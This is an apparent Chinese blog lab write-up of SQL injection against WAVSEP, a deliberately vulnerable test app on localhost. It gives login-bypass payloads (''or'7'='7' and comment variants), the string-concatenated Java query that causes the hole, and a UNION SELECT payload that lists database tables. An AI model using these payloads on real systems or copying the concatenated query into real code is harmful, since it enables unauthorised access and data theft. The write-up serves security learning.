[WAVSEP]SQL注入

说明

  • 环境
    Ubuntu 18.04.1
    Linux version 4.15.0-46-generic
    tomcat8
    mysql5.7

  • 实验内容
    wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/

开始喽

1、sql注入case1
打开本次sql注入页面(wavsep中GET500中的case1)

http://127.0.0.1:8080/wavsep/SInjection-Detection-Evaluation-GET-500Error/Case1-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2

页面显示“login failed”

[WAVSEP]SQL注入_第1张图片
然后在用户名和密码处插入注入语句进行尝试绕过登录(‘or’7’='7):

http://127.0.0.1:8080/wavsep/SInjection-Detection-Evaluation-GET-500Error/Case1-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username='or'7'='7&password='or'7'='7

页面显示“hello user1”
[WAVSEP]SQL注入_第2张图片
其他:

Exploit (both input fields): 'or'7'='7
Independent Exploit 1: ' or 7=7--%20 
Independent Exploit 2: ' or 7=7#%20 
Independent Exploit 3: ' or 7=7/*%20

分析源码:
参考http://www.sec-redclub.com/archives/763/

String username = request.getParameter("username");
String password = request.getParameter("password");

String SqlString = 
            "SELECT username, password " +
 	        "FROM users " +
 	        "WHERE username='" + username + "'" +
 	        " AND password='" + password + "'";

通过上述登录成功(‘or’7’=‘7’)的事例可以发现其sql查询语句为:select username,password from users where username=’‘or’7’=‘7’ and password=’‘or’7’=‘7’'当username或username和password为真的时候则查询成功,为否则查询失败;这个就是利用相关语句组合的查询语句造成注入成功的注入语句。

1、sql注入case2
wavsep中GET500中的case2:http://127.0.0.1:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=textvalue
[WAVSEP]SQL注入_第3张图片
因为是mysql数据库,因此msg的值替换

' UNION SELECT 1, table_name, 'jfks' FROM information_schema.tables--%20

即为

http://127.0.0.1:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=' UNION SELECT 1, table_name, 'jfks' FROM information_schema.tables--%20

结果ok
[WAVSEP]SQL注入_第4张图片

你可能感兴趣的:(web安全)